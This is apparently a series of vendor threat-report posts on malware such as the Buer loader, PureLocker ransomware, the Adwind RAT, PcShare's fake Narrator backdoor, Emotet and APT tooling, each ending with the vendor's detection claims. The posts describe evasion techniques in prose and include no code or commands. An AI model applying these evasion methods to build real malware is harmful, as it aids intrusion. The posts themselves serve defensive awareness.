Buer Loader Designed for Malware-as-a-Service Attackers

What Is It?

Researchers at Proofpoint have been following the appearance of a new downloader, named Buer by its authors, since the latter part of August 2019. This downloader is sold on various dark web forums and contains a feature set that is similar to the highly prevalent Smoke Loader. Smoke Loader is known to have downloaded various trojans, including those specifically designed for stealing financial and banking credentials.

In previous Threat Reports we have discussed a subset of malware called downloaders (often shortened to just “loaders”). When used by attackers, a loader is the initial infection vector, designed to evade detection by endpoint security products and then download and execute one or more malicious payloads. Loaders provide attackers a great deal of flexibility as to the malicious payloads they can deploy and are generally used by attackers utilizing malware-as-a-service (MaaS) options. If a loader evades detection it can download a variety of malware families and variants by numerous unrelated attackers. Conversely, if a loader is detected and prevented from executed, then a wide range of attacks can be blocked.

In August, researchers first noticed Buer being installed on systems compromised by the tried and true method of a Microsoft Word document containing a malicious macro attached to a spam email. This was followed by several other malicious campaigns in September and October. While investigating, researchers found Buer was being sold for $400. The advertisement for its sale contained a lot of information regarding the feature set of the control panel, used by the purchaser to monitor infections and interact with infected systems. Obviously, this is an important aspect for potential customers, usually less technically-skilled attackers, who choose MaaS.

The primary function of the Buer loader is to download and execute other malware. To achieve this Buer needs to evade detection, which it attempts with common methods such as checking for virtual machines, debuggers and that it is not running on systems in various former Soviet countries. It also encrypts strings and obfuscates Windows system calls. Researchers also found support for downloading additional modules, though they did not observe this behavior as of yet.

How Does It Propagate?

Buer loader does not contain the necessary code to self-propagate. It has been observed being distributed by spam campaigns containing Word document attachments with malicious macros.

When/How Did BluVector Detect It?

Five samples listed in the research report are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown these samples would have been detected an average of 38 months prior to their release.

 


PureLocker Multiplatform Ransomware Avoids Legacy AntiVirus Detection

What Is It?

PureLocker, a new multiplatform ransomware recently named by researchers from Intezer and IBM X-Force, is being used in targeted attacks against production servers of enterprise-level organizations. While the research was performed on Windows variants, they also observed a Linux variant being used by the attackers, providing them with more options for compromising the infrastructure of their targets.

The name PureLocker derives from the fact it is written in the programming language PureBasic. The use of the somewhat obscure PureBasic language is advantageous to the attackers in two important ways. Firstly, PureBasic is relatively easily ported between Windows, Linux and macOS, increasing the potential attack surface with limited effort. Secondly, Intezer found signature-based antivirus had difficulty detecting PureBasic executables. In fact, over a three-week period from mid to late October 2019, samples submitted to VirusTotal varied between one and zero detections out of the 66+ products the samples were tested against. They also found samples showed no malicious behavior when tested against several sandboxes.

To avoid detection, PureLocker utilizes multiple techniques. Text strings within a sample are often utilized for signature-based detection, as such obfuscation of strings is quite common. In the case of PureLocker, strings are stored as hex strings and decoded as required. Upon execution, PureLocker checks to ensure that it is not being debugged or otherwise analyzed. While this is a common technique, PureLocker does something different as it will exit but not delete itself if it detects analysis attempts. By not deleting itself, it potentially appears less likely to be malicious behaviorally than a sample which exits and deletes itself. It also checks what process is executing it, its filename extension, the current year is 2019 and administrator level access.

If all checks pass and PureLocker executes its ransomware payload, it avoids executable files and encrypts a large range of data files, appending .CR1 to the end of the filename. Once encrypted, the original file is deleted securely. The displayed ransom note contains a unique Proton email address for communication with the attackers and does not contain a ransom amount, clearly this is negotiated with the attackers via email.

How Does It Propagate?

PureLocker does not contain the necessary code to self-propagate. The infection vector is not known, however for most ransomware it is social engineering, either as malicious attachments or downloads performed by malicious documents.

When/How Did BluVector Detect It?

Despite the observed difficulties that legacy anti-virus and sandbox products have detecting PureLocker, two samples are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected both. Regression testing has shown the samples would have been detected a full 52 and 53 months respectively, prior to their release.


Fileless Malware: If You’re Not Worried, You Should Be

Gartner, Inc. estimates that more than $124 billion will be spent on information security products and services in 2019. Conversely, it is estimated that cybercrime will cost the world in excess of $6 trillion annually by 2021, up from $3 trillion in 2015. While the message that “crime does not pay” was drilled into our heads in TV and movies… it seems that it this crime does.

The first computer “virus” can be traced back to 1971. Named “Creeper system,” it would infect the computer with the message “I'm the creeper, catch me if you can!” and would disable that workstation.

Over the years, the bad guys continue to hone their tools and the computer virus has paved the way for computer worms, ransomware, spyware, adware, trojan horses, keyloggers, rootkits and other malicious software. While each of have their own unique traits, they intent is the same -- infecting a computer to do something “evil” on behalf of a threat actor.

As the cat-and-mouse game between security professionals and threat actors play out on a daily basis, a new threat is emerging that is keeping the good guys up at night. The threat of fileless malware is increasing and brings up a unique set of challenges that still thinks about how to combat file-based attacks.

Fileless malware describes a set of attacks that use the underlying operating system, usually Microsoft Windows, against itself. A typical end user barely scratches the surface of the capabilities built into the operating system. Under the hood of Windows are over 100 legitimate Windows system tools including PowerShell, Windows Management Instrumentation (WMI), .NET and Microsoft Office Macros that can be exploited in a fileless malware attack.

These tools do serve a purpose in the typical enterprise. PowerShell is used by system administrators to automate tasks; WMI is used to manage Windows workstations on a network; .NET is used for custom application development and Microsoft Office Macros can be used work magic in Microsoft Word, Excel or PowerPoint.

So, how can you protect against these types of attacks? Turning everything off isn’t possible. A typical enterprise would quickly grind to a halt (and it would be virtually technically impossible to do).

The first thing to keep in mind is that the most common attack vector for fileless malware attacks is delivery as an attachment to an email. Microsoft Office documents or PDF files are often used to deliver a payload with malicious intent. The payload will attempt to use one or more legitimate Windows tools to execute a script or macro and exploit that workstation. As they utilize legitimate Windows functions, they are hard to detect. So threat actors can hide in the shadows of what looks to be normal activity.

Existing, signature-based security can help with known threats, yet they’re challenged to protect against fileless malware attacks. The payload seems to be legitimate and will not raise any red flags. The key to protecting against fileless malware is to look beyond the payload’s contains, and instead understand what that payload is capable of.

While great efforts have been made to educate end users to recognize when an email doesn’t look right and enabling them with a mechanism to report it to the security team, it is only part of the solution. It only takes one user to open an attachment that they should not have to cause a problem.

This is where machine learning (ML) and artificial intelligence (AI) can play a large part in the defense of a network. ML and AI can analyze files and network traffic at line speeds and determine if that content has the potential to do something malicious. A Microsoft Excel spreadsheet with a macro that calculates commissions for a sales team is likely legitimate, but a spreadsheet that executes a Microsoft PowerShell command to download a piece of code is probably not.

A well-trained workforce is a key part of network defense, but it doesn’t scale. An effective defense needs to analyze traffic as it comes across the network and stop it before it makes it into users’ inboxes.

The good news is that the Speculative Code Execution in BluVector Cortex was created to help with the detection of fileless malware within an organization’s network environment. If you’re already a customer, you already have this capability.


Adwind RAT Targets U.S. Petroleum Industry

What Is It?

A new campaign utilizing the Adwind RAT (Remote Access Trojan) and specifically targeting organizations within the U.S. petroleum industry has been discovered by researchers at Netskope. The Adwind RAT is also known as AlienSpy, Frutas, jRAT, JSocket and Sockrat and is written in Java, allowing it to execute on Windows, Linux and Mac systems.

Adwind is available for sale by its authors on the dark web via a malware-as-a-service (MaaS) offering, where attackers pay a fee in order to use the malware in their malicious campaigns. Adwind has been available for a number of years and reports state there were approximately 1,800 unique customers at the end of 2015.

Adwind contains functionality expected of a RAT, including the ability to log keystrokes, steal credentials stored on the system or entered on web pages, take screenshots or audio and video, manipulate files, steal cryptocurrency keys and VPN certificates and download and execute other malware. Netskope found that the attackers behind this campaign were using Adwind as a reconnaissance and exfiltration tool to acquire credentials, documents and other files, such as SSH keys to allow the attackers to move laterally through the network.

The Adwind malware itself isn’t particularly sophisticated at a code level and Netskope believes the variants in this campaign weren’t using the latest versions. However, what makes this campaign noteworthy is the use of multi-level obfuscation and encryption as an attempt to evade detection by legacy security products, including anti-virus. The initial malicious Java JAR file infects systems at targeted organizations as an attachment or a link in a malicious spam email. This JAR file copies itself to the user’s directory and runs the copy, which then decrypts and executes the next stage, which in turn then creates the final JAR payload.

Netskope found the author’s time and effort was well spent creating the multi-level obfuscation and encryption. When the samples were initially scanned by the VirusTotal service, the initial sample was only detected by five products, whereas the final, unobfuscated sample was detected by 49. Clearly their techniques were successful at evading detection by legacy anti-virus products.

After the fact, these products can now create signatures to detect this specific initial sample, however, BluVector Cortex was capable of detecting both these samples months prior to them even being created.

How Does It Propagate?

The Adwind malware does not contain the necessary code to self-propagate. Malicious spam emails containing a link or attachment are used to compromise systems at targeted organizations.

When/How Did BluVector Detect It?

Both the initial and final malicious JAR samples were detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown these samples would have been detected for an average of 30 months prior to their release.

 


PcShare Malware Brings a Fake Narrator

What Is It?

Researchers from Cylance’s research and intelligence team have detailed an ongoing campaign called PcShare by a suspected Chinese APT (Advanced Persistent Threat) group targeting heavy industrial organizations in South East Asia, including the Philippines and Taiwan. The attack, comprised of two components, starts with is a customized variant of a Chinese open source remote access trojan (RAT), PcShare, which is then followed by a trojanized screen reader which replaces the Narrator utility, part of Microsoft Accessibility Features supplied with Microsoft Windows 10.

The source code for several versions of PcShare is available on GitHub, however the version used by these attackers is heavily modified and employs techniques intended to make detection, especially by legacy anti-virus products, more difficult. Firstly, the code for any functionality not required by the attackers has been removed, which not only makes the code smaller and more efficient, but is likely intended to make signature-based detection less likely. Next, the attack uses a technique known as “DLL side loading” to use a legitimate application to load malicious code into memory and execute it. In this case, a component of the NVIDIA graphics driver is used to achieve this.

The malicious payload is encrypted with the most basic method of a XOR operation using a single byte as the encryption key. However, as an anti-analysis mechanism against manual or automated sandbox analysis, the single byte encryption key is calculated based on the name of its parent process. Once decrypted, the payload is loaded in RAM without ever being saved to disk, again attempting to avoid detection by endpoint security software. These techniques are all relevant in the context that the malware is executing on an endpoint and have no impact on BluVector’s network detection capabilities.

Some of the functionality removed from publicly available PcShare versions relates to audio/video streaming and keylogging. However, the attackers have added the ability to encrypt C2 (command and control) traffic. The have also added code to obtain proxy authentication credentials stored on the infected system. As most corporate networks utilize proxies; this allows the malware to communicate in such an environment. As a RAT, functionality exists to manipulate files, running processes, registry keys and to download and execute other code.

One such piece of code is the so-called fake Narrator malware. The purpose of fake Narrator is to allow the attackers to remotely obtain access to a command prompt, with system level privileges, without authentication. Prior to installing fake Narrator on an infected system, the attackers will rename the legitimate Narrator executable. When fake Narrator has been enabled at the logon screen via Ease Of Access, it runs the legitimate Narrator and creates a hidden, overlapped window. It then monitors keystrokes for a hardcoded password which, if received, allows the attackers to run any application with system privileges on the logon screen. The infected system is now completely compromised and remotely accessible by the attackers.

How Does It Propagate?

The malware discussed here does not self-propagate. The infection vector is not known. However, the most likely vector is social engineering, either as a malicious attachment or downloads performed by malicious documents or links.

When/How Did BluVector Detect It?

Three samples of PcShare are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Despite the samples being first seen in the wild up to 15 months ago, regression testing has shown the samples would have been detected an average of 47 months prior to their original release.


Emotet Returns After a Summer Break

What Is It?

First discovered in 2014, the Emotet trojan has previously been the subject of several Threat Reports. Initially a banking trojan, it has since evolved to focus on the sending of spam emails and distribution of other malware. This change in functionality might be tied be more profitable option for its authors.

In early June 2019, it was observed that its C2 (command and control) servers had stopped communicating with infected systems. Researchers posited this would be a temporary shutdown and were proven correct, as C2 traffic restarted on August 22nd. After the restart, it appears that the authors performed some housekeeping on their infrastructure, such as removing fake bots attempting to communicate to the C2 servers and preparing the next campaign.

In mid-September the new campaign began, aimed at users in the U.S., the UK, Poland, Italy and Germany. This was a widespread campaign, with spam emails received by home users in addition to corporate and government organizations. Researchers from Cofense Labs found emails from this campaign were sent to users at more than 30,000 domain names and came from 3,362 unique senders at 1,875 domains. The sender’s email credentials had previously been stolen. The spam emails used mainly financially orientated lures, such as overdue bills or payment receipts and were written in the language (English, Polish, Italian and German) matching the domain they were sent to. True to form for Emotet, the attachments to these emails were Microsoft Word documents with malicious macros. Once the Emotet trojan was installed, the Trickbot trojan was downloaded, which frequently results in a tertiary infection of Ryuk ransomware.

The campaign described above has been followed up with another beginning this week. Utilizing another oft-used technique from the attacker’s playbook, the lure of this campaign is that the attachment is a Microsoft Word copy of the highly-publicized and controversial new book by Edward Snowden.

Researchers from Malwarebytes Labs found examples of these spam emails in English, French, Spanish, German and Italian. When the user opens the Microsoft Word document, it uses a similar social engineering technique to the previous campaign to convince users to provide the necessary permissions to allow the malicious macro to execute. In this case, it states Word has not been activated and in order to continue using it, they must enable editing and enable content.

Emotet continues to be an extremely dangerous and prolific threat, in most cases a triple threat of Emotet, Trickbot and Ryuk. The potential end result being the theft of data and credentials followed by encryption of user’s data.

How Does It Propagate?

Emotet uses malicious Microsoft Word documents attached to spam emails as its initial infection vector. However, Emotet also contains a list of frequently used passwords which it uses to attempt to access and infect other systems on the network.

When/How Did BluVector Detect It?

Samples are publicly available from both Emotet campaigns described above and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown samples of both the malicious Microsoft Word documents and the Emotet trojan would have been detected for up to 69 months prior to their release.


Every Employee Is a Cybersecurity Employee

Once, during new hire training, a portion of the training included a representative from each department to introduce their department, its function and to answer any questions from new employees.

In one of these trainings, a salesman talked about his team and then asked the new employees “what department do you work in?” Hands went up with answers of “finance,” “human resources,” “customer support,” “engineering” among others. Once everyone was done, he took a dramatic pause and loudly stated, “No! you all work in sales!” His logic was that every employee of the company worked for sales for each of them helped to represent and “sell” the company to others.

Today, while that still rings true, there is an additional job that everyone in the organization has – being part of the cyber defense for the organization. That shared responsibility is key in making sure that an organization, of any size, is protected against threats.

In 2004, to help promote awareness of the threats, the National Cyber Security Division within the Department of Homeland Security and the nonprofit National Cyber Security Alliance launched National Cyber Security Awareness Month(NCSAM).

October is NCSAM and the theme for 2019 is “Own IT. Secure IT. Protect IT.”, which puts the focus of the shared responsibility on the individual. “Own IT” focuses on the end-user owning their own presence online making them responsible for privacy and application usage. “Secure IT” is about reminding end users to ensure that all transactions are secure and that they are aware of their surroundings online. Finally, “Protect IT” reminds users and enterprises to keep up with the latest security software and patches for browsers, devices and operating systems, as well as to make sure that data that is collected (data at rest) is protected.

Security and IT organizations should focus their efforts around setting up awareness and education programs for both their end users as well as system administrators and security teams. End users should be educated on how to spot, avoid and report phishing emails to avoid exposing the organization to malware. System administrators should be reminded to keep their applications and servers up to date with patches and staying abreast of the latest Common Vulnerabilities and Exposures (CVE) that are relevant for their systems. Users with remote access permissions or using their own devices (BYOT) need to be reminded how to use these safely to access organization resources. Finally, all employees need to understand the exposure created by the use of social media, especially for the risk posed by spearphishing.

Cybersecurity awareness should not be limited to the month of October. The awareness activities and programs shouldn’t be limited to one month. Organizations are under a constant threat coming from all every angle. Keeping an organization secure is full time job and just like the sales guy who stated that everyone is in sales… every employee is part of the cyber defense for an organization.


Thrip APT Group Continues Attacks

What Is It?

Symantec has published the results of research into continuing attacks from an APT (Advanced Persistent Threat) group known as Thrip. It first reported on the activities of this group in June 2018, after Thrip had been targeting satellite communications, telecommunications, geospatial imaging and government/defense organizations, mainly in South East Asia. Attacks by Thrip utilized custom malware in addition to commonly used utilities such as PsExec, Powershell and the open source FTP client, WinSCP.

Since mid-2018, Thrip has continued to target organizations in South East Asia involved in maritime communications, media, education, military and additional satellite communications providers. Target organizations are located in Hong Kong, Indonesia, Macau, Malaysia, the Philippines and Vietnam.

The custom malware utilized in these attacks consists of two backdoors, designated Hannotog and Sagerunex. Additionally, Thrip uses new variants of an information stealer referred to as Catchamas. The Hannotog backdoor provides Thrip with a foothold into a network, Sagerunex offers remote access to systems within the network and Catchamas is selectively installed on systems identified as potentially containing information of value to the attackers.

Thrip also makes use of commonly used utilities, known as “living off the land,” to move laterally through network and perform reconnaissance. From an attacker’s point of view, this is to make use of a target system’s native tools that have numerous legitimate uses, such as Powershell, which is heavily used by Microsoft Windows administrators to perform system management tasks. In this way, less malware needs to be deployed, potentially reducing the likelihood of detection of the compromise, especially by legacy anti-virus solutions.

Symantec found that the Sagerunex appears to be an updated variant of the Evora backdoor malware used by the Billbug APT group. The group has been active for more than 10 years and like Thrip, has a history of executing attacks against organizations in South East Asia. Attribution can be an inexact science, but Symantec believe that Thrip and Billbug may be the same group or separate teams within the same group. Billbug has previously used spearphishing attacks with malicious PDF or Microsoft Office documents as its initial infection vector.

How Does It Propagate?

Though not specifically mentioned, it is likely that the initial infection vector occurs via malicious PDF or Microsoft documents, either as attachments or links within spearphishing emails.

When/How Did BluVector Detect It?

There are 25 samples publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown the samples would have been detected for an average of 21 months prior to their release.


Microsoft .NET Utilized to Create New Malware Threats on the Fly

An Internet Storm Center diary entry from last week has described recent examples the handler had seen of malware that dynamically compiled the next payload on the infected system. While this is not a new approach to attempting to evade detection, previous instances required that development tools such as compilers were already installed on the system, significantly reducing the potential attack surface. This meant that the user of the infected machine might be a software writer. On one side, this would limit the amount of targets. On the other hand, if a software writer were to compile software that might be shared or sent to others, this would increase the likelihood of additional infections.

In this case, the samples utilize components of the Microsoft .NET runtime environment, which is installed on the vast majority of systems running Microsoft Windows. That means that any system running Windows might be vulnerable to this type of attack.

Both samples create Metasploit Meterpreter reverse shells, giving attackers backdoor access to infected systems. The first sample is a JScript script which decodes included base64 data and passes it to the JScript compiler, resulting in an executable payload. The second sample is a Microsoft Excel spreadsheet containing a malicious macro which also decodes included base64 data. This time the decoded data is passed to the msbuild.exe utility, again resulting in an executable payload.

In both of these cases the attackers are attempting to use dynamic compilation to evade detection for their second stage payloads. However, there is nothing sophisticated or novel in regards to their initial infection vectors, negating their second stage efforts.

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine (MLE) detected the samples. Regression testing has shown the samples would have been detected up to 71 months prior to their release.


APT28 Using Sofacy Backdoor to Evade Machine Learning

The Cylance Threat Research Team released a deep dive report into a piece of malware utilized by the APT28 cyber espionage group, also known as Fancy Bear. The sample was originally uploaded to VirusTotal in May 2019 by US Cyber Command.

The malware, often referred to by legacy AV by the generic name Sofacy, is a backdoor, receives instructions from a C2 (command and control) site and is capable of uploading and downloading files that can create processes and execute a remote shell. It can also contact its C2 site on a predefined schedule, otherwise remaining apparently dormant. C2 communication occurs over port 443 (HTTPS) or port 80 (HTTP). As with many backdoors, it includes the ability to generate C2 host domain names for resiliency purposes.

As this APT malware is used as the initial infection on compromised systems, researchers believe the APT28 group has spent considerable time and effort developing it in an attempt to evade detection by products utilizing machine learning. Examples of this include using standard libraries and compilers, commonly used by benign software. The researchers believe 99% of the code appears to be benign, which may be an attempt to bias the result of detection engines using machine learning towards a benign determination.

When/How Did BluVector Detect It?

Despite the apparent machine learning detection countermeasures, this sample is detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown the sample would have been detected 13 months prior to its original release.